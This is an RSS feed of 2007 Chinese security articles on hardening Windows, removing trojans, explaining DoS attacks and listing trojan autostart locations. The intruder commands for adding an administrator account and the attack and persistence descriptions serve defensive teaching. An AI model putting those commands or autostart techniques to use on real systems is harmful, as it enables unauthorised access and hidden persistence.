<BR><BR>对于服务器和主机来说，一般只安装TCP/IP协议就够了。鼠标右击“网络邻居”，选择“属性”，再鼠标右击“本地连接”，选择“属性”，卸载不必要的协议。其中NETBIOS是很多安全缺陷的根源，对于不需要提供文件和打印共享的主机，还可以将绑定在TCP/IP协议的NETBIOS关闭，避免针对NETBIOS的攻击。选择“TCP/IP协议/属性/高级”，进入“高级TCP/IP设置”对话框，选择“WINS”标签，勾选“禁用TCP/IP上的NETBIOS”一项，关闭NETBIOS。&nbsp;&nbsp;&nbsp; <BR><BR>2.关闭“文件和打印共享”&nbsp;&nbsp;&nbsp; <BR><BR>文件和打印共享应该是一个非常有用的功能，但在不需要它的时候，也是黑客入侵的很好的安全漏洞。所以在没有必要“文件和打印共享”的情况下，我们可以将它关闭。用鼠标右击“网络邻居”，选择“属性”，然后单击“文件和打印共享”按钮，将弹出的“文件和打印共享”对话框中的两个复选框中的钩去掉即可。&nbsp;&nbsp;&nbsp; <BR><BR>虽然“文件和打印共享”关闭了，但是还不能确保安全，还要修改注册表，禁止它人更改“文件和打印共享”。打开注册表编辑器，选择“HKEY_CURRENT_USER\Software\&nbsp;Microsoft&nbsp;\Windows\CurrentVersion\Policies\NetWork”主键，在该主键下新建DWORD类型的键值，键值名为“NoFileSharingControl”，键值设为“1”表示禁止这项功能，从而达到禁止更改“文件和打印共享”的目的；键值为“0”表示允许这项功能。这样在“网络邻居”的“属性”对话框中“文件和打印共享”就不复存在了。&nbsp;&nbsp;&nbsp; <BR><BR>3.把Guest账号禁用&nbsp;&nbsp;&nbsp; <BR><BR>有很多入侵都是通过这个账号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具，那还是禁止的好。打开控制面板，双击“用户和密码”，单击“高级”选项卡，再单击“高级”按钮，弹出本地用户和组窗口。在Guest账号上面点击右键，选择属性，在“常规”页中选中“账户已停用”。另外，将Administrator账号改名可以防止黑客知道自己的管理员账号，这会在很大程度上保证计算机安全。&nbsp;&nbsp;&nbsp; <BR><BR>4.禁止建立空连接&nbsp;&nbsp;&nbsp; <BR><BR>在默认的情况下，任何用户都可以通过空连接连上服务器，枚举账号并猜测密码。因此，我们必须禁止建立空连接。方法有以下两种：&nbsp;&nbsp;&nbsp; <BR><BR>方法一是修改注册表：打开注册表“HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA”，将DWORD值“RestrictAnonymous”的键值改为“1”即可。&nbsp;&nbsp;&nbsp; <BR><BR>最后建议大家给自己的系统打上补丁，&nbsp;微软&nbsp;那些没完没了的补丁还是很有用的！&nbsp;&nbsp;&nbsp; <BR><BR>四、隐藏IP地址&nbsp;&nbsp;&nbsp; <BR><BR>黑客经常利用一些网络探测技术来查看我们的主机信息，主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念，如果攻击者知道了你的IP地址，等于为他的攻击准备好了目标，他可以向这个IP发动各种进攻，如DoS(&nbsp;拒绝服务&nbsp;)攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。&nbsp;&nbsp;&nbsp; <BR><BR>与直接连接到Internet相比，使用代理服务器能保护上网用户的IP地址，从而保障上网安全。代理服务器的原理是在客户机（用户上网的计算机）和远程服务器（如用户想访问远端WWW服务器）之间架设一个“中转站”，当客户机向远程服务器提出服务要求后，代理服务器首先截取用户的请求，然后代理服务器将服务请求转交远程服务器，从而实现客户机和远程服务器之间的联系。很显然，使用代理服务器后，其它用户只能探测到代理服务器的IP地址而不是用户的IP地址，这就实现了隐藏用户IP地址的目的，保障了用户上网安全。提供免费代理服务器的网站有很多，你也可以自己用代理猎手等工具来查找。&nbsp;&nbsp;&nbsp; <BR><BR>五、关闭不必要的端口&nbsp;&nbsp;&nbsp; <BR><BR>黑客在入侵时常常会扫描你的计算机端口，如果安装了端口监视程序（比如Netwatch），该监视程序则会有警告提示。如果遇到这种入侵，可用&nbsp;工具软件&nbsp;关闭用不到的端口，比如，用“Norton&nbsp;Internet&nbsp;Security”关闭用来提供网页服务的80和443端口，其他一些不常用的端口也可关闭。&nbsp;&nbsp;&nbsp; <BR><BR>六、更换管理员帐户&nbsp;&nbsp;&nbsp; <BR><BR>Administrator帐户拥有最高的系统权限，一旦该帐户被人利用，后果不堪设想。黑客入侵的常用手段之一就是试图获得Administrator帐户的密码，所以我们要重新配置Administrator帐号。&nbsp;&nbsp;&nbsp; <BR><BR>首先是为Administrator帐户设置一个强大复杂的密码，然后我们重命名Administrator帐户，再创建一个没有管理员权限的Administrator帐户欺骗入侵者。这样一来，入侵者就很难搞清哪个帐户真正拥有管理员权限，也就在一定程度上减少了危险性。&nbsp;&nbsp;&nbsp; <BR><BR>七、杜绝Guest帐户的入侵&nbsp;&nbsp;&nbsp; <BR><BR>Guest帐户即所谓的来宾帐户，它可以访问计算机，但受到限制。不幸的是，Guest也为黑客入侵打开了方便之门！网上有很多文章中都介绍过如何利用Guest用户得到管理员权限的方法，所以要杜绝基于Guest帐户的系统入侵。&nbsp;&nbsp;&nbsp; <BR><BR>禁用或彻底删除Guest帐户是最好的办法，但在某些必须使用到Guest帐户的情况下，就需要通过其它途径来做好防御工作了。首先要给Guest设一个强壮的密码，然后详细设置Guest帐户对物理路径的访问权限。举例来说，如果你要防止Guest用户可以访问tool文件夹，可以右击该文件夹，在弹出菜单中选择“安全”标签，从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户即可。或者在权限中为相应的用户设定权限，比方说只能“列出文件夹目录”和“读取”等，这样就安全多了。&nbsp;&nbsp;&nbsp; <BR><BR>八、安装必要的安全软件&nbsp;&nbsp;&nbsp; <BR><BR>我们还应在电脑中安装并使用必要的防黑软件，杀毒软件和&nbsp;防火墙&nbsp;都是必备的。在上网时打开它们，这样即便有黑客进攻我们的安全也是有保证的。&nbsp;&nbsp;&nbsp; <BR><BR>九、防范木马程序&nbsp;&nbsp;&nbsp; <BR><BR>木马程序会窃取所植入电脑中的有用信息，因此我们也要防止被黑客植入木马程序，常用的办法有：&nbsp;&nbsp;&nbsp; <BR><BR>●&nbsp;在下载文件时先放到自己新建的文件夹里，再用杀毒软件来检测，起到提前预防的作用。&nbsp;&nbsp;&nbsp; <BR><BR>●&nbsp;在“开始”→“程序”→“启动”或“开始”→“程序”→“Startup”选项里看是否有不明的运行项目，如果有，删除即可。&nbsp;&nbsp;&nbsp; <BR><BR>●&nbsp;将注册表里&nbsp;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的所有以“Run”为前缀的可疑程序全部删除即可。&nbsp;&nbsp;&nbsp; <BR><BR>十、不要回陌生人的邮件&nbsp;&nbsp;&nbsp; <BR><BR>有些黑客可能会冒充某些正规网站的名义，然后编个冠冕堂皇的理由寄一封信给你要求你输入上网的用户名称与密码，如果按下“确定”，你的帐号和密码就进了黑客的邮箱。所以不要随便回陌生人的邮件，即使他说得再动听再诱人也不上当。&nbsp;&nbsp;&nbsp; <BR><BR>做好IE的安全设置&nbsp;&nbsp;&nbsp; <BR><BR>ActiveX控件和&nbsp;Applets有较强的功能，但也存在被人利用的隐患，网页中的恶意代码往往就是利用这些控件编写的小程序，只要打开网页就会被运行。所以要避免恶意网页的攻击只有禁止这些恶意代码的运行。IE对此提供了多种选择，具体设置步骤是：“工具”→“Internet选项”→“安全”→“自定义级别”，建议您将ActiveX控件与相关选项禁用。谨慎些总没有错！&nbsp;&nbsp;&nbsp; <BR><BR>另外，在IE的安全性设定中我们只能设定Internet、本地Intranet、受信任的站点、受限制的站点。不过，微软在这里隐藏了“我的电脑”的安全性设定，通过修改注册表把该选项打开，可以使我们在对待ActiveX控件和&nbsp;Applets时有更多的选择，并对本地电脑安全产生更大的影响。&nbsp;&nbsp;&nbsp; <BR><BR>下面是具体的方法：打开“开始”菜单中的“运行”，在弹出的“运行”对话框中输入Regedit.exe，打开注册表编辑器，点击前面的“+”号顺次展开到：HKEY_CURRE-NT_USER\Software\Microsoft\Windows\CurrentVersion\InternetSettings\Zones\0，在右边窗口中找到DWORD值“Flags”，默认键值为十六进制的21(十进制33)，双击“Flags”，在弹出的对话框中将它的键值改为“1”即可，关闭注册表编辑器。无需重新启动电脑，重新打开IE，再次点击“工具→Internet选项→安全”标签，你就会看到多了一个“我的电脑”图标，在这里你可以设定它的安全等级。将它的安全等级设定高些，这样的防范更严密。</P>]]></description>
</item>
<item>
	<title><![CDATA[恶意邮件蠕虫假冒安全更新引诱用户上当]]></title>
	<link><![CDATA[http://www.csnic.net:81/n556c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:02:13 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>Technologies警告称，目前又发现一种通过电子邮件传播的恶意蠕虫，能够给用户的计算机造成很大的破坏。 </P>
<P>据Theinquirer.net网站报道，这家安全公司介绍说，这种电子邮件一般写得很差，几乎没有什么意义。这种电子邮件谈论的内容是机器人、补丁和蠕虫。下面是这种电子邮件的全文： </P>
<P><BR>亲爱的用户:<BR>我们的机器人修复了来自你发送电子邮件的IP地址的一个异常行为。<BR>也许这种异常行为与上一次的蠕虫感染有关。<BR>这个蠕虫感染现在还没有使用补丁修复。<BR>我们建议你安装一个防火墙模块。它将阻止发送上述电子邮件。<BR>否则，你的电子邮件账户将被封锁，直到你消除这个错误为止。<BR>客户技术支持中心机器人<BR>&nbsp;</P>
<P>据MicroWorld公司称，许多用户被这种系统生成性质的文本信息所迷惑。MicroWorld首席执行官Govind Rammurthy表示，许多用户以为这种电子邮件是机器发出来的，而不是人类发出来的，从而麻痹了用户鉴别真伪的能力。 </P>
<P>这种蠕虫名为“Warazov”，也称作“Warazov”。这是一种可执行文件，能够把各种恶意软件安装到你的计算机中并且能够把自己发送到地址簿中的每一个收件人。MicroWorld警告用户千万不要麻痹大意。</P>]]></description>
</item>
<item>
	<title><![CDATA[手工清除隐藏的病毒和木马]]></title>
	<link><![CDATA[http://www.csnic.net:81/n555c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:01:53 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[注册表一直都是很多木马和病毒“青睐”的寄生场所，注意在检查注册表之前要先给注册表备份。&nbsp; <BR><BR>　　1、&nbsp;检查注册表中HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Run和HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Runserveice，查看键值中有没有自己不熟悉的自动启动文件，扩展名一般为EXE，然后记住木马程序的文件名，再在整个注册表中搜索，凡是看到了一样的文件名的键值就要删除，接着到电脑中找到木马文件的藏身地将其彻底删除?比如“爱虫”病毒会修改上面所提的第一项，BO2000木马会修改上面所提的第二项)。&nbsp; <BR><BR>　　2、&nbsp;检查注册表HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER＼SOFTWARE＼Microsoft＼Internet&nbsp;Explorer＼Main中的几项(如Local&nbsp;Page)，如果发现键值被修改了，只要根据你的判断改回去就行了。恶意代码(如“万花谷”)就经常修改这几项。&nbsp; <BR><BR>　　3、检查HKEY_CLASSES_ROOT＼inifile&nbsp;＼shell＼open＼command和HKEY_CLASSES_ROOT&nbsp;＼txtfile＼shell＼open＼command等等几个常用文件类型的默认打开程序是否被更改。这个一定要改回来，很多病毒就是通过修改.txt、.ini等的默认打开程序而清除不了的。例如“罗密欧与朱丽叶”?BleBla病毒就修改了很多文件(包括.jpg、.rar、.mp3等)的默认打开程序。&nbsp; <BR><BR>　　检查你的系统配置文件&nbsp; <BR><BR>　　其实检查系统配置文件最好的方法是打开Windows“系统配置实用程序”(从开始菜单运行msconfig.exe)，在里面你可以配置Config.sys、Autoexec.bat、system.ini和win.ini，并且可以选择启动系统的时间。&nbsp; <BR><BR>　　1、检查win.ini文件(在C?＼windows＼下)，打开后，在?WINDOWS?下面，“run=”和“load=”是可能加载“木马”程序的途径，必须仔细留心它们。在一般情况下，在它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了。比如攻击QQ的“GOP木马”就会在这里留下痕迹。&nbsp; <BR><BR>　　2、检查system.ini文件(在C:＼windows＼下)，在BOOT下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是“explorer.exe”，而是“shell=&nbsp;explorer.exe&nbsp;程序名”，那么后面跟着的那个程序就是“木马”程序，然后你就要在硬盘找到这个程序并将其删除了。这类的病毒很多，比如“尼姆达”病毒就会把该项修改为“shell=explorer.exe&nbsp;load.exe&nbsp;-dontrunold”。&nbsp;]]></description>
</item>
<item>
	<title><![CDATA[常见拒绝服务攻击类型及分析]]></title>
	<link><![CDATA[http://www.csnic.net:81/n554c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 06:59:28 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>2007真不愧是黑客年,这两天很多客户来电称被拒绝服务,这样的事情的确是非常麻烦,不过现在的情况来看更多的攻击则来自有商业利益的攻击行为，这不得不值得我们去思考。<BR>&nbsp;&nbsp;&nbsp; <BR>拒绝服务攻击即攻击者想办法让目标机器停止提供服务或资源访问。这些资源包括磁盘空间、内存、进程甚至网络带宽，从而阻止正常用户的访问。其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一小部分，只要能够对目标造成麻烦，使某些服务被暂停甚至主机死机，都属于拒绝服务攻击。拒绝服务攻击问题也一直得不到合理的解决，究其原因是因为这是由于网络协议本身的安全缺陷造成的，从而拒绝服务攻击也成为了攻击者的终极手法。 </P>
<P>攻击者进行拒绝服务攻击，实际上让服务器实现两种效果：一是迫使服务器的缓冲区满，不接收新的请求；二是使用IP欺骗，迫使服务器把合法用户的连接复位，影响合法用户的连接。</P>
<P>接下来了解一下几种常见的拒绝服务攻击的原理：</P>
<P>1．SYN Foold<BR>SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(Distributed Denial Of Service分布式拒绝服务攻击)的方式之一，这是一种利用TCP协议缺陷，发送大量伪造的TCP连接请求，使被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。 </P>
<P>SYN Flood攻击的过程在TCP协议中被称为三次握手(Three-way Handshake)，而SYN Flood拒绝服务攻击就是通过三次握手而实现的。</P>
<P>(1) 攻击者向被攻击服务器发送一个包含SYN标志的TCP报文，SYN(Synchronize)即同步报文。同步报文会指明客户端使用的端口以及TCP连接的初始序号。这时同被攻击服务器建立了第一次握手。</P>
<P>(2) 受害服务器在收到攻击者的SYN报文后，将返回一个SYN+ACK的报文，表示攻击者的请求被接受，同时TCP序号被加一，ACK(Acknowledgement)即确认，这样就同被攻击服务器建立了第二次握手。</P>
<P>(3) 攻击者也返回一个确认报文ACK给受害服务器，同样TCP序列号被加一，到此一个TCP连接完成，三次握手完成。</P>
<P>具体原理是：TCP连接的三次握手中，假设一个用户向服务器发送了SYN报文后突然死机或掉线，那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成)，这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接。这段时间的长度我们称为SYN Timeout，一般来说这个时间是分钟的数量级(大约为30秒~2分钟)；一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题，但如果有一个恶意的攻击者大量模拟这种情况(伪造IP地址)，服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源。即使是简单的保存并遍历也会消耗非常多的CPU时间和内存，何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大，最后的结果往往是堆栈溢出崩溃—— 既使服务器端的系统足够强大，服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小)，此时从正常客户的角度看来，服务器失去响应，这种情况就称作：服务器端受到了SYN Flood攻击(SYN洪水攻击)。 </P>
<P>2．IP欺骗DOS攻击 <BR>这种攻击利用RST位来实现。假设现在有一个合法用户(61.61.61.61)已经同服务器建立了正常的连接，攻击者构造攻击的TCP数据，伪装自己的IP为61.61.61.61，并向服务器发送一个带有RST位的TCP数据段。服务器接收到这样的数据后，认为从61.61.61.61发送的连接有错误，就会清空缓冲区中建立好的连接。这时，如果合法用户61.61.61.61再发送合法数据，服务器就已经没有这样的连接了，该用户就必须从新开始建立连接。攻击时，攻击者会伪造大量的IP地址，向目标发送RST数据，使服务器不对合法用户服务，从而实现了对受害服务器的拒绝服务攻击。 </P>
<P>3. UDP洪水攻击<BR>攻击者利用简单的TCP/IP服务，如Chargen和Echo来传送毫无用处的占满带宽的数据。通过伪造与某一主机的Chargen服务之间的一次的UDP连接，回复地址指向开着Echo服务的一台主机，这样就生成在两台主机之间存在很多的无用数据流，这些无用数据流就会导致带宽的服务攻击。 </P>
<P>4. Ping洪流攻击<BR>由于在早期的阶段，路由器对包的最大尺寸都有限制。许多操作系统对TCP/IP栈的实现在ICMP包上都是规定64KB，并且在对包的标题头进行读取之后，要根据该标题头里包含的信息来为有效载荷生成缓冲区。当产生畸形的，声称自己的尺寸超过ICMP上限的包也就是加载的尺寸超过64K上限时，就会出现内存分配错误，导致TCP/IP堆栈崩溃，致使接受方死机。 </P>
<P>5. 泪滴(teardrop)攻击<BR>泪滴攻击是利用在TCP/IP堆栈中实现信任IP碎片中的包的标题头所包含的信息来实现自己的攻击。IP分段含有指明该分段所包含的是原包的哪一段的信息，某些TCP/IP(包括service pack 4以前的NT)在收到含有重叠偏移的伪造分段时将崩溃。 </P>
<P>6. Land攻击 <BR>Land攻击原理是：用一个特别打造的SYN包，它的原地址和目标地址都被设置成某一个服务器地址。此举将导致接受服务器向它自己的地址发送SYN-ACK消息，结果这个地址又发回ACK消息并创建一个空连接。被攻击的服务器每接收一个这样的连接都将保留，直到超时，对Land攻击反应不同，许多UNIX实现将崩溃，NT变的极其缓慢(大约持续5分钟)。</P>
<P>7. Smurf攻击<BR>一个简单的Smurf攻击原理就是：通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求(ping)数据包来淹没受害主机的方式进行。最终导致该网络的所有主机都对此ICMP应答请求作出答复，导致网络阻塞。它比ping of death洪水的流量高出1或2个数量级。更加复杂的Smurf将源地址改为第三方的受害者，最终导致第三方崩溃。</P>
<P>8.Fraggle攻击 <BR>原理：Fraggle攻击实际上就是对Smurf攻击作了简单的修改，使用的是UDP应答消息而非ICMP。</P>]]></description>
</item>
<item>
	<title><![CDATA[让你的电脑变得更安全的七种方法]]></title>
	<link><![CDATA[http://www.csnic.net:81/n553c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 06:57:56 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[首先，我们当然要进到服务里，去看看有什么危险的系统进程在开着啦。看到注释吗?“允许远程操作注册表”，关掉它(Remote&nbsp;Registry)我点的是AT命令，也要关(Task&nbsp;Scheduler)，免得被入侵者用它来启动木马。&nbsp; <BR>　　1&nbsp;打开注册表，进入 <BR><BR>　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows&nbsp;NT\CurrentVersion\Winlogon <BR><BR>　　在右边找一个键值DontDisplayLastUserName，然后改成1，如果不存在，你就新建立一个! <BR><BR>　　2&nbsp;防止IPC空连接是非常必要的! <BR><BR>　　好，我们来到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa这里，找到这个主键restrictanonymous把它改成1 <BR><BR>　　如果改成2有些程序可能无法运行，所以一般改成1。 <BR><BR>　　3&nbsp;我们来修改3389的默认端口 <BR><BR>　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal&nbsp;Server\WinStations\RDP-Tcp <BR><BR>　　来到这里，找到PortNumber&nbsp;，十进制是3389的，你随意把它改成其它4个数字吧，我改成1314了 <BR><BR>　　这样入侵者就不能3389入侵你的电脑了。 <BR><BR>　　4&nbsp;进入cmd下，运行net&nbsp;share和net&nbsp;user <BR><BR>　　看看还有什么共享的和可疑的用户名。Administrator&nbsp;和&nbsp;Guest是系统默认的，不用删，怎么多了个×××? <BR><BR>　　不理了，删掉它。(net&nbsp;user&nbsp;×××&nbsp;/del) <BR><BR>　　关掉没用的共享。(net&nbsp;share&nbsp;C$&nbsp;/del,&nbsp;...) <BR><BR>　　5输入法漏洞 <BR><BR>　　解决方案:1.对这几个有漏洞的帮助文件进行删除或者改名等操作。 <BR><BR>　　最好就是删除WINIME.CHM，WINPY.CHM，WINZM.CHM这三个帮助文件。你会删其它吧? <BR><BR>　　6&nbsp;最重要，也很好用，一般无敌，^_^。 <BR><BR>　　在cmd下，进入c:\winnt\system32写入命令&nbsp;ren&nbsp;net.exe&nbsp;netwei.exe&nbsp;(回车) <BR><BR>　　好了，以后，别人就算进到你的电脑内，也不能用net&nbsp;user&nbsp;username&nbsp;pass&nbsp;/add增加用户 <BR><BR>　　更不能用net&nbsp;localgroup&nbsp;administrators&nbsp;username&nbsp;/add&nbsp;加入administrators了，呵呵~ <BR><BR>　　这个命令来建立用户并提升管理员了。改成netwei&nbsp;user.............. <BR><BR>　　7&nbsp;最后一步，也是关键的，这个可以防止别入格式化! <BR><BR>　　在CMD里写入命令:C:\&gt;DOSKEY&nbsp;FORMAT=Bad&nbsp;command&nbsp;or&nbsp;file&nbsp;name!&nbsp;(回车)这个是锁定命令，你也可以锁定DEL <BR><BR>　　当别人恶意格式化你的硬盘时，系统将会显示:“Bad&nbsp;command&nbsp;or&nbsp;file&nbsp;name!，拒绝执行格式化命令 <BR><BR>　　如果在某种特殊情况下，你自己需要格式化硬盘，那该怎么办呢?你可以输入下面的命令: <BR><BR>　　C:\&gt;DOSKEY&nbsp;FORMAT=&nbsp;(回车)这样你就可以像以前一样可以格式化了。]]></description>
</item>
<item>
	<title><![CDATA[微软系统账户安全设置]]></title>
	<link><![CDATA[http://www.csnic.net:81/n552c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 06:56:26 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>1、禁止显示登陆用户名：控制面板——管理工具——本地安全策略——本地策略——安全选项，在右侧选中“登陆屏幕上不显示上次登陆的用户名”设为已启用； 　　 </P>
<P>　　2、禁用GUEST帐户，禁用或删除一些不必要的帐户； 　　 </P>
<P>　　3、更改Administrator帐户的名字（在“我的电脑”点右键选择管理——本地用户和组——用户在右册窗口中选中Administrator点右键选重命名输入所需要名字即可）； 　　 </P>
<P>　　4、设定帐户锁定策略（控制面板——管理工具——本地安全策略——帐户策略——帐户锁定策略） 　　 </P>
<P>　　5、在XP中不允许SAM帐户匿名枚举：打开“组策略”，计算机配置——Windows设置——安全设置——本地策略——安全选项；双击“网络访问：不允许SAM帐户匿名枚举”，确保选中“已启用”；同时还要启用“网络访问：不允许 SAM帐户和共享的匿名枚举”； 　　 </P>
<P>　　6、开启密码策略：进入“控制面板——本地安全策略”，打开密码策略，设置该项如下： </P>
<P>　　密码复杂行要求：启用；　　 </P>
<P>　　密码长度最小值：7位； 　　 </P>
<P>　　强制密码历史：5位；　　 </P>
<P>　　最长存留期：42天； 　　 </P>
<P>　　7、设置用户权限：当多人共同用一台计算机时，可通过组织策略在Windows XP中设置用户权限。打开“组策略”展开“计算机配置——Windows设置——安全设置——本地策略——用户权利指派”分支。双击需要改变的用户权限。单击“增加”，然后双击想指派给权限的用户帐号.</P>]]></description>
</item>
<item>
	<title><![CDATA[看看黑客是否光顾过你的电脑]]></title>
	<link><![CDATA[http://www.csnic.net:81/n551c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 06:55:26 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>黑客病毒发作时什么样？很难说，因为它们发作时的情况多种多样。但是如果你的计算机有以下表现，就很可能染上黑客病毒了。&nbsp;&nbsp; <BR><BR>计算机有时死机，有时又重新启动；在没有执行什么操作的时候，却在拼命读写硬盘；系统莫明其妙地对软驱进行搜索；没有运行大的程序，而系统的速度越来越慢，用右键打开【我的电脑】，查看【属性】→【性能】中的【系统资源】正常时一般都在90％以上；用CTRL＋ALT＋DEL调出任务表，发现有多个名字相同的程序在运行，而且可能会随时间的增加而增多。特别是在连入Internet网或是局域网后，如果你的机器有这些现象，就应小心了，当然也有可能是一些其它的病毒在作怪。&nbsp;&nbsp; <BR><BR>在清除这些病毒的时候最好用最新的“杀虫剂”以防年久失效。如你手中没有杀毒软件，但是又确有不对劲的地方，是否病毒，还需要你的经验来断定！以下是几个经验：&nbsp;&nbsp; <BR><BR>1.&nbsp;查看c:\autoexec.bat与c:\config.sys，这两个文件里有一些系统所需的驱动程序。看看有无加入什么奇特的驱动程序，如有怀疑的对象就在他的前面加上“REM”，恢复时将“REM”去掉就可以了。&nbsp;&nbsp; <BR><BR>2.&nbsp;再看看Windows目录下的WIN.INI文件中开头的几行：&nbsp;&nbsp; <BR><BR>［WINDOWS］&nbsp;&nbsp; <BR><BR>load=&nbsp;&nbsp; <BR><BR>ren=&nbsp;&nbsp; <BR><BR>这里放的是启动Windows后自动执行的程序，如中文之星就在这里。黑客病毒note.exe就可能在这儿，如有怀疑的对象就在它前面加上“；”，恢复时将“；”去掉就可以了。&nbsp;&nbsp; <BR><BR>3.&nbsp;查看Windows目录下的SYSTEM.INI文件中的这几行：&nbsp;&nbsp; <BR><BR>［386Enh］&nbsp;&nbsp; <BR><BR>device=&nbsp;&nbsp; <BR><BR>这里一般是放置系统本身和外加的驱动程序。外加的驱动程序一般都用全路径，&nbsp;&nbsp; <BR><BR>如：&nbsp;&nbsp; <BR><BR>device=c:\abcd\1234.386&nbsp;&nbsp; <BR><BR>同样如有怀疑的对象就在前面加上“；”，恢复时将“；”去掉。&nbsp;&nbsp; <BR><BR>4.&nbsp;查看开始菜单中的【程序】→【启动】。&nbsp;&nbsp; <BR><BR>这里放的也是启动Windows后自动执行的程序，如有怀疑的对象就在&nbsp;&nbsp; <BR><BR>C:\Windows\Start&nbsp;Menu\Programs\启动中将它删除，恢复时从“回收站”恢复。&nbsp;&nbsp; <BR><BR>5.&nbsp;在Windows中，查看注册表。在【开始】→【运行】中执行“regedit”。&nbsp;&nbsp; <BR><BR>在修改以前请一定先做好备份。在注册表中看看。&nbsp;&nbsp; <BR><BR>\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\&nbsp;&nbsp; <BR><BR>CurrentVersion\RunServices和Run中执行了什么，&nbsp;&nbsp; <BR><BR>有名的“back&nbsp;orifice”病毒就在这里。&nbsp;&nbsp; <BR><BR>6.&nbsp;Windows中的执行文件.exe、.com、.dll、.386&nbsp;……它们都有可能是黑客病毒或携带者。在系统正常的时候，最好对以上文件做一个备份，有备无患嘛！&nbsp;&nbsp; <BR><BR>7.&nbsp;在Windows目录下，看看有无一个名为Winstart.bat的文件。这个文件也是与Autoexec.bat类似的一个自动批处理文件，不过它只能为Windows工作而不能用于DOS下使用。仔细看看其中有无什么你不知道的驱动程序。一般这个自动批处理文件是不会被用到的。如你也怀疑它可以先备份一份，&nbsp;&nbsp; <BR><BR>然后将它删除，再重新启动计算机。</P>]]></description>
</item>
<item>
	<title><![CDATA[关于木马的几种启动方式]]></title>
	<link><![CDATA[http://www.csnic.net:81/n550c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 06:54:59 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>木马是随计算机或Windows的启动而启动并掌握一定的控制权的，其启动方式可谓多种多样，通过注册表启动、通过System.ini启动、通过某些特定程序启动等，真是防不胜防。其实只要能够遏制住不让它启动，木马就没什么用了，这里就简单说说木马的启动方式，知己知彼百战不殆嘛。 <BR><BR>一、通过"开始\程序\启动" <BR><BR>隐蔽性:2星 <BR><BR>应用程度:较低 <BR><BR>这也是一种很常见的方式，很多正常的程序都用它，大家常用的QQ就是用这种方式实现自启动的，但木马却很少用它。因为启动组的每人会会出现在“系统配置实用程序”(msconfig.exe，以下简称msconfig)中。事实上，出现在“开始”菜单的“程序\启动”中足以引起菜鸟的注意，所以，相信不会有木马用这种启动方式。 <BR><BR>二、通过Win.ini文件 <BR><BR>隐蔽性:3星 <BR><BR>应用程度:较低 <BR><BR>应用案例:Asylum <BR><BR>同启动组一样，这也是从Windows3.2开始就可以使用的方法，是从Win16遗传到Win32的。在Windows3.2中，Win.ini就相当于Windows9x中的注册表，在该文件中的［Windows］域中的load和run项会在Windows启动时运行，这两个项目也会出现在msconfig中。而且，在Windows98安装完成后这两项就会被Windows的程序使用了，也不很适合木马使用。 <BR><BR>三、通过注册表启动 <BR><BR>1、通过HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run， <BR><BR>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run和 <BR><BR>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices <BR><BR>隐蔽性:3.5星 <BR><BR>应用程度:极高 <BR><BR>应用案例:BO2000，GOP，NetSpy，IEthief，冰河…… 